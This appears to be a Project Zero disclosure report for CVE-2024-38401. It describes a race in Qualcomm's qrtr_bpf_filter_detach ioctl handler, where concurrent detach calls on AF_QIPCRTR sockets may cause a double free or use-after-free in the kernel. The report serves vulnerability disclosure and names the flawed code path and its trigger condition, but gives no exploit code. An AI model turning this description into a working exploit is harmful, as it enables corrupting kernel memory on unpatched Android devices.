    There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach.In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or UAF (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.As we don't have a device (nor see any examples of existing Android devices) containing the necessary kernel configuration (CONFIG_QRTR_BPF_FILTER), we are presently unable to reproduce a crash for this bug. If you're aware of this option being enabled on any production kernels, I would be interested to know!This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-09-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlNOTE:This was originally reported as a non-security issue on June 17th, however Qualcomm has confirmed that there are affected devices and that they consider this a security issue, so adding this to the tracker.Related CVE Number: CVE-2024-38401.

Tag

#google